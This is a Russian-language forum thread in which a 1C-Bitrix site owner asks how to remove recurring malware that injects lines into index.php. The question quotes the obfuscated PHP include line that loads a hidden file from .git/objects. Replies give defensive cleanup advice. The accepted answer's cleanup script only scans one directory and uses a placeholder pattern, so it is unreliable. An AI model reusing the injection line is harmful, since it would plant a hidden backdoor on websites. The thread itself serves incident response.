Вирус на сайте добавляет строки в index.php по всем директориям. Как избавиться?

Ссылка скопирована
1С-Битрикс Вредоносное ПО
1 ответ

Пример кода, который добавляет вирус в файл index.php:

/*bc657*/ $r8 = "/hox6de3/login/public_htx6dl/.git/objects/34/.28e85653.css"; $trxc61 = substr($r8, 0); @include_once /* nk */ ($trxc61); /*bc657*/

/*bc657*/ $r8 = "/hox6de3/login/public_htx6dl/.git/objects/34/.28e85653.css"; $trxc61 = substr($r8, 0); @include_once /* nk */ ($trxc61); /*bc657*/

При наличии данного кода в используемых файлах возникают ошибки и страница не открывается. В самом коде видно что прописывается путь к файлу, который является вредоносным. После его удаления файл создаётся в другой папке .git/objects/

Ранее вирус также во многих директориях создал .htaccess. Я удалил их все. Сейчас только основной. Сканил сайт айболитом, удалял вредоносные файлы. Опять появляются.

Также помимо этого приходит куча запросов к папкам и файлам Wordpress, хотя сайт на Битриксе. Таких запросов бывает до 1000 за буквально 5 минут. Если блокирую один IP, начинают приходить с другого.

Сама подмена происходит раз в сутки, обычно ночью, в разное время.

Дополнительно:

это вирус прописывает себя в агенты на кроне. отключите крон. потом все почистите.

  • ну иплюс накатите последние обновления. он заражется через модуль VOTE. либо его удалите либо накатите обновления
  • а если это не агент, то по access.log смотрите запросы, и найдёте, где бэкдор

    • Ответы:

    Точных указаний что делать в этом случае нет, каждый сайт смотрится и решения там комплексные.

    Блокировкой адресов может заниматься fail2ban без твоего участия.

    Если что-то происходит каждый день и в одно и тоже время - первое что надо смотреть это крон в панели хостинга. Если там что-то есть то этот дырявый хостинг отправляется в мусорку и сайт переносится на reg.ru (никаких реклам, просто не вижу причин выбирать что-то кроме него)

    На папки вордпреса идут запросы потому что скрипт комплексный.

    Виной может быть нуленый плагин (или как там оно называется в этом овне), в админке есть проверка на целостность ее надо сделать в первую очередь.

    1. Делаете дампы файлов и бд, разворачиваете их у себя локально
    2. В кастомных сущностях (папки/файлы шаблона, компонентов) вычищаете все подозрительное, зараженное
    3. В бд вычищаете все подозрительное
    4. Локально разворачиваете чистый битрикс
    5. Переносите свои кастомные сущности в чистую установку
    6. Подключаете очищенную бд к сайту
    7. Смотрите работу сайта

    Если все ок, то переносите чистые файлы и базу на основной сервер.
    Далее меняете доступы к админке, базе, хостингу (серверу).

    Если не ок, то возвращаемся к п2

    Нужно решить такую задачу?

    Опишите проблему, и специалист поможет с настройкой, исправлением ошибки или доработкой сайта. Подберём понятный план работ без лишней переписки.

    Заказать помощь
    Лучший ответ
    1
    Дмитрий К. Ответ

    Для начала необходимо принять меры по удалению вируса с сайта. В таком случае, следует выполнить следующие шаги:

    1. Первым делом необходимо просканировать весь сайт с помощью антивирусного программного обеспечения. Это поможет выявить и удалить все зараженные файлы.

    2. После того как вирус будет удален, следует проверить файл index.php во всех директориях сайта на наличие подозрительного кода. Если вирус добавлял строки в этот файл, необходимо удалить все подозрительные строки.

    3. Для автоматического удаления вредоносного кода из всех файлов index.php можно воспользоваться следующим скриптом на языке PHP:

    $dir = '.'; // Указываем путь к корневой директории сайта
 
$files = scandir($dir);
 
foreach ($files as $file) {
    if (is_file($dir . '/' . $file) && $file == 'index.php') {
        $content = file_get_contents($dir . '/' . $file);
        $content = preg_replace('/вредоносный_код/', '', $content); // Заменить 'вредоносный_код' на реальный код вируса
        file_put_contents($dir . '/' . $file, $content);
    }
}

    $dir = '.'; // Указываем путь к корневой директории сайта $files = scandir($dir); foreach ($files as $file) { if (is_file($dir . '/' . $file) && $file == 'index.php') { $content = file_get_contents($dir . '/' . $file); $content = preg_replace('/вредоносный_код/', '', $content); // Заменить 'вредоносный_код' на реальный код вируса file_put_contents($dir . '/' . $file, $content); } }

    4. После того как вредоносный код будет удален из всех файлов index.php, следует обновить все пароли для доступа к сайту, так как вирус мог украсть учетные данные.

    5. Необходимо также обновить все используемые CMS и плагины до последних версий, чтобы закрыть уязвимости, через которые вирус мог попасть на сайт.

    6. Наконец, для повышения безопасности сайта рекомендуется регулярно делать резервные копии файлов и базы данных, чтобы иметь возможность быстрого восстановления в случае повторной атаки.

    После выполнения всех указанных шагов, сайт должен быть очищен от вредоносного кода и защищен от дальнейших атак.

    Другие ответы (0)

    Пока нет других ответов. Будьте первым, кто поможет автору.

    Ответить на вопрос

    комментарий

    Ваш адрес email не будет опубликован. Обязательные поля помечены *

    Вам также может быть интересно

    VPN Как правильно настроить vless для Android TV? 0 ответов Pyrogram Как правильно зарегистрировать юзер бота в Telegram? 0 ответов печатные-платы Как заставить запускаться программу M3.exe от компании Hanxing AOI в инспекционной машине на Windows 7 Pro? 0 ответов woocommerce Как отображать при фильтрации товары со значением search параметра visibility: HUSKY — Products Filter for WooCommerce? 0 ответов